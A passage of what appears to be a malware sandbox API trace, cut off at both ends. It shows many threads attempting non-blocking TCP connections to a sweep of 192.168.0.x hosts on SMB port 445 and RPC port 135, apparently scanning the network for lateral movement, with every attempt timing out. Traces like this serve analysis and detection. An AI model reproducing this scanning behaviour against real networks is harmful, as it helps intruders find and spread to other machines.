name=0x15cbff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.26"), namelen=16) returned -1 [0091.951] WSAGetLastError () returned 10035 [0091.951] select (in: nfds=0, readfds=0x0, writefds=0x15cbfd08, exceptfds=0x15cbfe10, timeout=0x15cbff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x15cbfd08, exceptfds=0x15cbfe10) returned 0 [0097.141] closesocket (s=0x129c) returned 0 [0097.141] inet_addr (cp="192.168.0.26") returned 0x1a00a8c0 [0097.141] htons (hostshort=0x87) returned 0x8700 [0097.141] socket (af=2, type=1, protocol=6) returned 0x129c [0097.141] ioctlsocket (in: s=0x129c, cmd=-2147195266, argp=0x15cbff34 | out: argp=0x15cbff34) returned 0 [0097.141] connect (s=0x129c, name=0x15cbff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.26"), namelen=16) returned -1 [0097.142] WSAGetLastError () returned 10035 [0097.142] select (in: nfds=0, readfds=0x0, writefds=0x15cbfd08, exceptfds=0x15cbfe10, timeout=0x15cbff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x15cbfd08, exceptfds=0x15cbfe10) returned 0 [0102.201] closesocket (s=0x129c) returned 0 [0102.204] RtlExitUserThread (Status=0x0) Thread: id = 288 os_tid = 0xe6c [0091.951] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072098 [0091.951] free (_Block=0x2072098) [0091.951] inet_addr (cp="192.168.0.25") returned 0x1900a8c0 [0091.952] htons (hostshort=0x1bd) returned 0xbd01 [0091.952] socket (af=2, type=1, protocol=6) returned 0x12a8 [0091.952] ioctlsocket (in: s=0x12a8, cmd=-2147195266, argp=0x15dfff34 | out: argp=0x15dfff34) returned 0 [0091.952] connect (s=0x12a8, name=0x15dfff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.25"), namelen=16) returned -1 [0091.953] WSAGetLastError () returned 10035 [0091.953] select (in: nfds=0, readfds=0x0, writefds=0x15dffd08, exceptfds=0x15dffe10, timeout=0x15dfff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x15dffd08, exceptfds=0x15dffe10) returned 0 [0097.160] closesocket (s=0x12a8) returned 0 [0097.161] inet_addr (cp="192.168.0.25") returned 0x1900a8c0 [0097.161] htons (hostshort=0x87) returned 0x8700 [0097.161] socket (af=2, type=1, protocol=6) returned 0x12a8 [0097.161] ioctlsocket (in: s=0x12a8, cmd=-2147195266, argp=0x15dfff34 | out: argp=0x15dfff34) returned 0 [0097.161] connect (s=0x12a8, name=0x15dfff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.25"), namelen=16) returned -1 [0097.161] WSAGetLastError () returned 10035 [0097.161] select (in: nfds=0, readfds=0x0, writefds=0x15dffd08, exceptfds=0x15dffe10, timeout=0x15dfff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x15dffd08, exceptfds=0x15dffe10) returned 0 [0102.216] closesocket (s=0x12a8) returned 0 [0102.217] RtlExitUserThread (Status=0x0) Thread: id = 289 os_tid = 0xe70 [0091.953] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072070 [0091.953] free (_Block=0x2072070) [0091.953] inet_addr (cp="192.168.0.24") returned 0x1800a8c0 [0091.953] htons (hostshort=0x1bd) returned 0xbd01 [0091.953] socket (af=2, type=1, protocol=6) returned 0x12b4 [0091.954] ioctlsocket (in: s=0x12b4, cmd=-2147195266, argp=0x15f3ff34 | out: argp=0x15f3ff34) returned 0 [0091.954] connect (s=0x12b4, name=0x15f3ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.24"), namelen=16) returned -1 [0091.954] WSAGetLastError () returned 10035 [0091.954] select (in: nfds=0, readfds=0x0, writefds=0x15f3fd08, exceptfds=0x15f3fe10, timeout=0x15f3ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x15f3fd08, exceptfds=0x15f3fe10) returned 0 [0097.159] closesocket (s=0x12b4) returned 0 [0097.159] inet_addr (cp="192.168.0.24") returned 0x1800a8c0 [0097.159] htons (hostshort=0x87) returned 0x8700 [0097.160] socket (af=2, type=1, protocol=6) returned 0x12b4 [0097.160] ioctlsocket (in: s=0x12b4, cmd=-2147195266, argp=0x15f3ff34 | out: argp=0x15f3ff34) returned 0 [0097.160] connect (s=0x12b4, name=0x15f3ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.24"), namelen=16) returned -1 [0097.160] WSAGetLastError () returned 10035 [0097.160] select (in: nfds=0, readfds=0x0, writefds=0x15f3fd08, exceptfds=0x15f3fe10, timeout=0x15f3ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x15f3fd08, exceptfds=0x15f3fe10) returned 0 [0102.218] closesocket (s=0x12b4) returned 0 [0102.218] RtlExitUserThread (Status=0x0) Thread: id = 290 os_tid = 0xe74 [0091.955] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072048 [0091.955] free (_Block=0x2072048) [0091.955] inet_addr (cp="192.168.0.23") returned 0x1700a8c0 [0091.955] htons (hostshort=0x1bd) returned 0xbd01 [0091.955] socket (af=2, type=1, protocol=6) returned 0x12c0 [0091.955] ioctlsocket (in: s=0x12c0, cmd=-2147195266, argp=0x1607ff34 | out: argp=0x1607ff34) returned 0 [0091.955] connect (s=0x12c0, name=0x1607ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.23"), namelen=16) returned -1 [0091.956] WSAGetLastError () returned 10035 [0091.956] select (in: nfds=0, readfds=0x0, writefds=0x1607fd08, exceptfds=0x1607fe10, timeout=0x1607ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1607fd08, exceptfds=0x1607fe10) returned 0 [0097.158] closesocket (s=0x12c0) returned 0 [0097.158] inet_addr (cp="192.168.0.23") returned 0x1700a8c0 [0097.158] htons (hostshort=0x87) returned 0x8700 [0097.158] socket (af=2, type=1, protocol=6) returned 0x12c0 [0097.158] ioctlsocket (in: s=0x12c0, cmd=-2147195266, argp=0x1607ff34 | out: argp=0x1607ff34) returned 0 [0097.159] connect (s=0x12c0, name=0x1607ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.23"), namelen=16) returned -1 [0097.159] WSAGetLastError () returned 10035 [0097.159] select (in: nfds=0, readfds=0x0, writefds=0x1607fd08, exceptfds=0x1607fe10, timeout=0x1607ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1607fd08, exceptfds=0x1607fe10) returned 0 [0102.219] closesocket (s=0x12c0) returned 0 [0102.220] RtlExitUserThread (Status=0x0) Thread: id = 291 os_tid = 0xe78 [0091.956] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072020 [0091.956] free (_Block=0x2072020) [0091.956] inet_addr (cp="192.168.0.22") returned 0x1600a8c0 [0091.956] htons (hostshort=0x1bd) returned 0xbd01 [0091.956] socket (af=2, type=1, protocol=6) returned 0x12cc [0091.956] ioctlsocket (in: s=0x12cc, cmd=-2147195266, argp=0x161bff34 | out: argp=0x161bff34) returned 0 [0091.957] connect (s=0x12cc, name=0x161bff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.22"), namelen=16) returned -1 [0091.957] WSAGetLastError () returned 10035 [0091.957] select (in: nfds=0, readfds=0x0, writefds=0x161bfd08, exceptfds=0x161bfe10, timeout=0x161bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x161bfd08, exceptfds=0x161bfe10) returned 0 [0097.156] closesocket (s=0x12cc) returned 0 [0097.157] inet_addr (cp="192.168.0.22") returned 0x1600a8c0 [0097.157] htons (hostshort=0x87) returned 0x8700 [0097.157] socket (af=2, type=1, protocol=6) returned 0x12cc [0097.157] ioctlsocket (in: s=0x12cc, cmd=-2147195266, argp=0x161bff34 | out: argp=0x161bff34) returned 0 [0097.157] connect (s=0x12cc, name=0x161bff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.22"), namelen=16) returned -1 [0097.158] WSAGetLastError () returned 10035 [0097.158] select (in: nfds=0, readfds=0x0, writefds=0x161bfd08, exceptfds=0x161bfe10, timeout=0x161bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x161bfd08, exceptfds=0x161bfe10) returned 0 [0102.221] closesocket (s=0x12cc) returned 0 [0102.221] RtlExitUserThread (Status=0x0) Thread: id = 292 os_tid = 0xe7c [0091.958] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2071ff8 [0091.958] free (_Block=0x2071ff8) [0091.958] inet_addr (cp="192.168.0.21") returned 0x1500a8c0 [0091.958] htons (hostshort=0x1bd) returned 0xbd01 [0091.958] socket (af=2, type=1, protocol=6) returned 0x12d8 [0091.958] ioctlsocket (in: s=0x12d8, cmd=-2147195266, argp=0x162fff34 | out: argp=0x162fff34) returned 0 [0091.958] connect (s=0x12d8, name=0x162fff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.21"), namelen=16) returned -1 [0091.959] WSAGetLastError () returned 10035 [0091.959] select (in: nfds=0, readfds=0x0, writefds=0x162ffd08, exceptfds=0x162ffe10, timeout=0x162fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x162ffd08, exceptfds=0x162ffe10) returned 0 [0097.155] closesocket (s=0x12d8) returned 0 [0097.156] inet_addr (cp="192.168.0.21") returned 0x1500a8c0 [0097.156] htons (hostshort=0x87) returned 0x8700 [0097.156] socket (af=2, type=1, protocol=6) returned 0x12d8 [0097.156] ioctlsocket (in: s=0x12d8, cmd=-2147195266, argp=0x162fff34 | out: argp=0x162fff34) returned 0 [0097.156] connect (s=0x12d8, name=0x162fff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.21"), namelen=16) returned -1 [0097.156] WSAGetLastError () returned 10035 [0097.156] select (in: nfds=0, readfds=0x0, writefds=0x162ffd08, exceptfds=0x162ffe10, timeout=0x162fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x162ffd08, exceptfds=0x162ffe10) returned 0 [0102.222] closesocket (s=0x12d8) returned 0 [0102.223] RtlExitUserThread (Status=0x0) Thread: id = 293 os_tid = 0xe80 [0091.959] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2071fd0 [0091.959] free (_Block=0x2071fd0) [0091.959] inet_addr (cp="192.168.0.20") returned 0x1400a8c0 [0091.959] htons (hostshort=0x1bd) returned 0xbd01 [0091.959] socket (af=2, type=1, protocol=6) returned 0x12e4 [0091.960] ioctlsocket (in: s=0x12e4, cmd=-2147195266, argp=0x1643ff34 | out: argp=0x1643ff34) returned 0 [0091.960] connect (s=0x12e4, name=0x1643ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.20"), namelen=16) returned -1 [0091.960] WSAGetLastError () returned 10035 [0091.960] select (in: nfds=0, readfds=0x0, writefds=0x1643fd08, exceptfds=0x1643fe10, timeout=0x1643ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1643fd08, exceptfds=0x1643fe10) returned 0 [0097.154] closesocket (s=0x12e4) returned 0 [0097.154] inet_addr (cp="192.168.0.20") returned 0x1400a8c0 [0097.154] htons (hostshort=0x87) returned 0x8700 [0097.154] socket (af=2, type=1, protocol=6) returned 0x12e4 [0097.155] ioctlsocket (in: s=0x12e4, cmd=-2147195266, argp=0x1643ff34 | out: argp=0x1643ff34) returned 0 [0097.155] connect (s=0x12e4, name=0x1643ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.20"), namelen=16) returned -1 [0097.155] WSAGetLastError () returned 10035 [0097.155] select (in: nfds=0, readfds=0x0, writefds=0x1643fd08, exceptfds=0x1643fe10, timeout=0x1643ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1643fd08, exceptfds=0x1643fe10) returned 0 [0102.224] closesocket (s=0x12e4) returned 0 [0102.225] RtlExitUserThread (Status=0x0) Thread: id = 294 os_tid = 0xe84 [0091.961] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2071fa8 [0091.961] free (_Block=0x2071fa8) [0091.961] inet_addr (cp="192.168.0.19") returned 0x1300a8c0 [0091.961] htons (hostshort=0x1bd) returned 0xbd01 [0091.961] socket (af=2, type=1, protocol=6) returned 0x12f0 [0091.964] ioctlsocket (in: s=0x12f0, cmd=-2147195266, argp=0x1657ff34 | out: argp=0x1657ff34) returned 0 [0091.964] connect (s=0x12f0, name=0x1657ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.19"), namelen=16) returned -1 [0091.964] WSAGetLastError () returned 10035 [0091.964] select (in: nfds=0, readfds=0x0, writefds=0x1657fd08, exceptfds=0x1657fe10, timeout=0x1657ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1657fd08, exceptfds=0x1657fe10) returned 0 [0097.153] closesocket (s=0x12f0) returned 0 [0097.153] inet_addr (cp="192.168.0.19") returned 0x1300a8c0 [0097.153] htons (hostshort=0x87) returned 0x8700 [0097.153] socket (af=2, type=1, protocol=6) returned 0x12f0 [0097.153] ioctlsocket (in: s=0x12f0, cmd=-2147195266, argp=0x1657ff34 | out: argp=0x1657ff34) returned 0 [0097.154] connect (s=0x12f0, name=0x1657ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.19"), namelen=16) returned -1 [0097.154] WSAGetLastError () returned 10035 [0097.154] select (in: nfds=0, readfds=0x0, writefds=0x1657fd08, exceptfds=0x1657fe10, timeout=0x1657ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1657fd08, exceptfds=0x1657fe10) returned 0 [0102.226] closesocket (s=0x12f0) returned 0 [0102.227] RtlExitUserThread (Status=0x0) Thread: id = 295 os_tid = 0xe88 [0091.965] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2071f80 [0091.965] free (_Block=0x2071f80) [0091.965] inet_addr (cp="192.168.0.18") returned 0x1200a8c0 [0091.965] htons (hostshort=0x1bd) returned 0xbd01 [0091.965] socket (af=2, type=1, protocol=6) returned 0x12fc [0091.965] ioctlsocket (in: s=0x12fc, cmd=-2147195266, argp=0x166bff34 | out: argp=0x166bff34) returned 0 [0091.965] connect (s=0x12fc, name=0x166bff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.18"), namelen=16) returned -1 [0091.966] WSAGetLastError () returned 10035 [0091.966] select (in: nfds=0, readfds=0x0, writefds=0x166bfd08, exceptfds=0x166bfe10, timeout=0x166bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x166bfd08, exceptfds=0x166bfe10) returned 0 [0097.151] closesocket (s=0x12fc) returned 0 [0097.152] inet_addr (cp="192.168.0.18") returned 0x1200a8c0 [0097.152] htons (hostshort=0x87) returned 0x8700 [0097.152] socket (af=2, type=1, protocol=6) returned 0x12fc [0097.152] ioctlsocket (in: s=0x12fc, cmd=-2147195266, argp=0x166bff34 | out: argp=0x166bff34) returned 0 [0097.152] connect (s=0x12fc, name=0x166bff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.18"), namelen=16) returned -1 [0097.152] WSAGetLastError () returned 10035 [0097.153] select (in: nfds=0, readfds=0x0, writefds=0x166bfd08, exceptfds=0x166bfe10, timeout=0x166bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x166bfd08, exceptfds=0x166bfe10) returned 0 [0102.227] closesocket (s=0x12fc) returned 0 [0102.228] RtlExitUserThread (Status=0x0) Thread: id = 296 os_tid = 0xe8c [0091.966] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2071f58 [0091.966] free (_Block=0x2071f58) [0091.966] inet_addr (cp="192.168.0.17") returned 0x1100a8c0 [0091.966] htons (hostshort=0x1bd) returned 0xbd01 [0091.966] socket (af=2, type=1, protocol=6) returned 0x1308 [0091.967] ioctlsocket (in: s=0x1308, cmd=-2147195266, argp=0x167fff34 | out: argp=0x167fff34) returned 0 [0091.967] connect (s=0x1308, name=0x167fff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.17"), namelen=16) returned -1 [0091.967] WSAGetLastError () returned 10035 [0091.967] select (in: nfds=0, readfds=0x0, writefds=0x167ffd08, exceptfds=0x167ffe10, timeout=0x167fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x167ffd08, exceptfds=0x167ffe10) returned 0 [0097.150] closesocket (s=0x1308) returned 0 [0097.150] inet_addr (cp="192.168.0.17") returned 0x1100a8c0 [0097.150] htons (hostshort=0x87) returned 0x8700 [0097.150] socket (af=2, type=1, protocol=6) returned 0x1308 [0097.151] ioctlsocket (in: s=0x1308, cmd=-2147195266, argp=0x167fff34 | out: argp=0x167fff34) returned 0 [0097.151] connect (s=0x1308, name=0x167fff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.17"), namelen=16) returned -1 [0097.151] WSAGetLastError () returned 10035 [0097.151] select (in: nfds=0, readfds=0x0, writefds=0x167ffd08, exceptfds=0x167ffe10, timeout=0x167fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x167ffd08, exceptfds=0x167ffe10) returned 0 [0102.229] closesocket (s=0x1308) returned 0 [0102.230] RtlExitUserThread (Status=0x0) Thread: id = 297 os_tid = 0xe90 [0091.971] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x77d968 [0091.971] free (_Block=0x77d968) [0091.971] inet_addr (cp="192.168.0.16") returned 0x1000a8c0 [0091.971] htons (hostshort=0x1bd) returned 0xbd01 [0091.971] socket (af=2, type=1, protocol=6) returned 0x1314 [0091.971] ioctlsocket (in: s=0x1314, cmd=-2147195266, argp=0x1693ff34 | out: argp=0x1693ff34) returned 0 [0091.971] connect (s=0x1314, name=0x1693ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.16"), namelen=16) returned -1 [0091.972] WSAGetLastError () returned 10035 [0091.972] select (in: nfds=0, readfds=0x0, writefds=0x1693fd08, exceptfds=0x1693fe10, timeout=0x1693ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1693fd08, exceptfds=0x1693fe10) returned 0 [0097.161] closesocket (s=0x1314) returned 0 [0097.162] inet_addr (cp="192.168.0.16") returned 0x1000a8c0 [0097.162] htons (hostshort=0x87) returned 0x8700 [0097.162] socket (af=2, type=1, protocol=6) returned 0x1314 [0097.162] ioctlsocket (in: s=0x1314, cmd=-2147195266, argp=0x1693ff34 | out: argp=0x1693ff34) returned 0 [0097.162] connect (s=0x1314, name=0x1693ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.16"), namelen=16) returned -1 [0097.163] WSAGetLastError () returned 10035 [0097.163] select (in: nfds=0, readfds=0x0, writefds=0x1693fd08, exceptfds=0x1693fe10, timeout=0x1693ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1693fd08, exceptfds=0x1693fe10) returned 0 [0102.215] closesocket (s=0x1314) returned 0 [0102.216] RtlExitUserThread (Status=0x0) Thread: id = 298 os_tid = 0xe94 [0091.972] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x77d940 [0091.972] free (_Block=0x77d940) [0091.972] inet_addr (cp="192.168.0.15") returned 0xf00a8c0 [0091.973] htons (hostshort=0x1bd) returned 0xbd01 [0091.973] socket (af=2, type=1, protocol=6) returned 0x1320 [0091.973] ioctlsocket (in: s=0x1320, cmd=-2147195266, argp=0x16a7ff34 | out: argp=0x16a7ff34) returned 0 [0091.973] connect (s=0x1320, name=0x16a7ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.15"), namelen=16) returned -1 [0091.974] WSAGetLastError () returned 10035 [0091.974] select (in: nfds=0, readfds=0x0, writefds=0x16a7fd08, exceptfds=0x16a7fe10, timeout=0x16a7ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x16a7fd08, exceptfds=0x16a7fe10) returned 0 [0097.163] closesocket (s=0x1320) returned 0 [0097.163] inet_addr (cp="192.168.0.15") returned 0xf00a8c0 [0097.163] htons (hostshort=0x87) returned 0x8700 [0097.163] socket (af=2, type=1, protocol=6) returned 0x1320 [0097.164] ioctlsocket (in: s=0x1320, cmd=-2147195266, argp=0x16a7ff34 | out: argp=0x16a7ff34) returned 0 [0097.164] connect (s=0x1320, name=0x16a7ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.15"), namelen=16) returned -1 [0097.164] WSAGetLastError () returned 10035 [0097.164] select (in: nfds=0, readfds=0x0, writefds=0x16a7fd08, exceptfds=0x16a7fe10, timeout=0x16a7ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x16a7fd08, exceptfds=0x16a7fe10) returned 0 [0102.251] closesocket (s=0x1320) returned 0 [0102.251] RtlExitUserThread (Status=0x0) Thread: id = 299 os_tid = 0xe98 [0091.974] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x77d918 [0091.974] free (_Block=0x77d918) [0091.974] inet_addr (cp="192.168.0.14") returned 0xe00a8c0 [0091.974] htons (hostshort=0x1bd) returned 0xbd01 [0091.974] socket (af=2, type=1, protocol=6) returned 0x132c [0091.974] ioctlsocket (in: s=0x132c, cmd=-2147195266, argp=0x16bbff34 | out: argp=0x16bbff34) returned 0 [0091.974] connect (s=0x132c, name=0x16bbff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.14"), namelen=16) returned -1 [0091.975] WSAGetLastError () returned 10035 [0091.975] select (in: nfds=0, readfds=0x0, writefds=0x16bbfd08, exceptfds=0x16bbfe10, timeout=0x16bbff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x16bbfd08, exceptfds=0x16bbfe10) returned 0 [0097.164] closesocket (s=0x132c) returned 0 [0097.165] inet_addr (cp="192.168.0.14") returned 0xe00a8c0 [0097.165] htons (hostshort=0x87) returned 0x8700 [0097.165] socket (af=2, type=1, protocol=6) returned 0x132c [0097.165] ioctlsocket (in: s=0x132c, cmd=-2147195266, argp=0x16bbff34 | out: argp=0x16bbff34) returned 0 [0097.165] connect (s=0x132c, name=0x16bbff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.14"), namelen=16) returned -1 [0097.165] WSAGetLastError () returned 10035 [0097.165] select (in: nfds=0, readfds=0x0, writefds=0x16bbfd08, exceptfds=0x16bbfe10, timeout=0x16bbff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x16bbfd08, exceptfds=0x16bbfe10) returned 0 [0102.249] closesocket (s=0x132c) returned 0 [0102.250] RtlExitUserThread (Status=0x0) Thread: id = 300 os_tid = 0xe9c [0091.975] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x77d8f0 [0091.976] free (_Block=0x77d8f0) [0091.976] inet_addr (cp="192.168.0.13") returned 0xd00a8c0 [0091.976] htons (hostshort=0x1bd) returned 0xbd01 [0091.976] socket (af=2, type=1, protocol=6) returned 0x1338 [0091.976] ioctlsocket (in: s=0x1338, cmd=-2147195266, argp=0x16cfff34 | out: argp=0x16cfff34) returned 0 [0091.976] connect (s=0x1338, name=0x16cfff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.13"), namelen=16) returned -1 [0091.977] WSAGetLastError () returned 10035 [0091.977] select (in: nfds=0, readfds=0x0, writefds=0x16cffd08, exceptfds=0x16cffe10, timeout=0x16cfff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x16cffd08, exceptfds=0x16cffe10) returned 0 [0097.165] closesocket (s=0x1338) returned 0 [0097.166] inet_addr (cp="192.168.0.13") returned 0xd00a8c0 [0097.166] htons (hostshort=0x87) returned 0x8700 [0097.166] socket (af=2, type=1, protocol=6) returned 0x1338 [0097.166] ioctlsocket (in: s=0x1338, cmd=-2147195266, argp=0x16cfff34 | out: argp=0x16cfff34) returned 0 [0097.166] connect (s=0x1338, name=0x16cfff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.13"), namelen=16) returned -1 [0097.166] WSAGetLastError () returned 10035 [0097.167] select (in: nfds=0, readfds=0x0, writefds=0x16cffd08, exceptfds=0x16cffe10, timeout=0x16cfff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x16cffd08, exceptfds=0x16cffe10) returned 0 [0102.248] closesocket (s=0x1338) returned 0 [0102.248] RtlExitUserThread (Status=0x0) Thread: id = 301 os_tid = 0xea0 [0091.977] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x77d8c8 [0091.978] free (_Block=0x77d8c8) [0091.978] inet_addr (cp="192.168.0.12") returned 0xc00a8c0 [0091.978] htons (hostshort=0x1bd) returned 0xbd01 [0091.978] socket (af=2, type=1, protocol=6) returned 0x1344 [0091.978] ioctlsocket (in: s=0x1344, cmd=-2147195266, argp=0x16e3ff34 | out: argp=0x16e3ff34) returned 0 [0091.978] connect (s=0x1344, name=0x16e3ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.12"), namelen=16) returned -1 [0091.979] WSAGetLastError () returned 10035 [0091.979] select (in: nfds=0, readfds=0x0, writefds=0x16e3fd08, exceptfds=0x16e3fe10, timeout=0x16e3ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x16e3fd08, exceptfds=0x16e3fe10) returned 0 [0097.167] closesocket (s=0x1344) returned 0 [0097.167] inet_addr (cp="192.168.0.12") returned 0xc00a8c0 [0097.167] htons (hostshort=0x87) returned 0x8700 [0097.167] socket (af=2, type=1, protocol=6) returned 0x1344 [0097.167] ioctlsocket (in: s=0x1344, cmd=-2147195266, argp=0x16e3ff34 | out: argp=0x16e3ff34) returned 0 [0097.168] connect (s=0x1344, name=0x16e3ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.12"), namelen=16) returned -1 [0097.168] WSAGetLastError () returned 10035 [0097.168] select (in: nfds=0, readfds=0x0, writefds=0x16e3fd08, exceptfds=0x16e3fe10, timeout=0x16e3ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x16e3fd08, exceptfds=0x16e3fe10) returned 0 [0102.246] closesocket (s=0x1344) returned 0 [0102.247] RtlExitUserThread (Status=0x0) Thread: id = 302 os_tid = 0xea4 [0091.979] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x77d8a0 [0091.979] free (_Block=0x77d8a0) [0091.979] inet_addr (cp="192.168.0.11") returned 0xb00a8c0 [0091.979] htons (hostshort=0x1bd) returned 0xbd01 [0091.980] socket (af=2, type=1, protocol=6) returned 0x1350 [0091.980] ioctlsocket (in: s=0x1350, cmd=-2147195266, argp=0x16f7ff34 | out: argp=0x16f7ff34) returned 0 [0091.980] connect (s=0x1350, name=0x16f7ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.11"), namelen=16) returned -1 [0091.980] WSAGetLastError () returned 10035 [0091.980] select (in: nfds=0, readfds=0x0, writefds=0x16f7fd08, exceptfds=0x16f7fe10, timeout=0x16f7ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x16f7fd08, exceptfds=0x16f7fe10) returned 0 [0097.168] closesocket (s=0x1350) returned 0 [0097.169] inet_addr (cp="192.168.0.11") returned 0xb00a8c0 [0097.169] htons (hostshort=0x87) returned 0x8700 [0097.169] socket (af=2, type=1, protocol=6) returned 0x1350 [0097.169] ioctlsocket (in: s=0x1350, cmd=-2147195266, argp=0x16f7ff34 | out: argp=0x16f7ff34) returned 0 [0097.169] connect (s=0x1350, name=0x16f7ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.11"), namelen=16) returned -1 [0097.169] WSAGetLastError () returned 10035 [0097.169] select (in: nfds=0, readfds=0x0, writefds=0x16f7fd08, exceptfds=0x16f7fe10, timeout=0x16f7ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x16f7fd08, exceptfds=0x16f7fe10) returned 0 [0102.244] closesocket (s=0x1350) returned 0 [0102.245] RtlExitUserThread (Status=0x0) Thread: id = 303 os_tid = 0xea8 [0091.981] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x77d878 [0091.981] free (_Block=0x77d878) [0091.981] inet_addr (cp="192.168.0.10") returned 0xa00a8c0 [0091.981] htons (hostshort=0x1bd) returned 0xbd01 [0091.981] socket (af=2, type=1, protocol=6) returned 0x135c [0091.981] ioctlsocket (in: s=0x135c, cmd=-2147195266, argp=0x170bff34 | out: argp=0x170bff34) returned 0 [0091.982] connect (s=0x135c, name=0x170bff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.10"), namelen=16) returned -1 [0091.982] WSAGetLastError () returned 10035 [0091.982] select (in: nfds=0, readfds=0x0, writefds=0x170bfd08, exceptfds=0x170bfe10, timeout=0x170bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x170bfd08, exceptfds=0x170bfe10) returned 0 [0097.169] closesocket (s=0x135c) returned 0 [0097.170] inet_addr (cp="192.168.0.10") returned 0xa00a8c0 [0097.170] htons (hostshort=0x87) returned 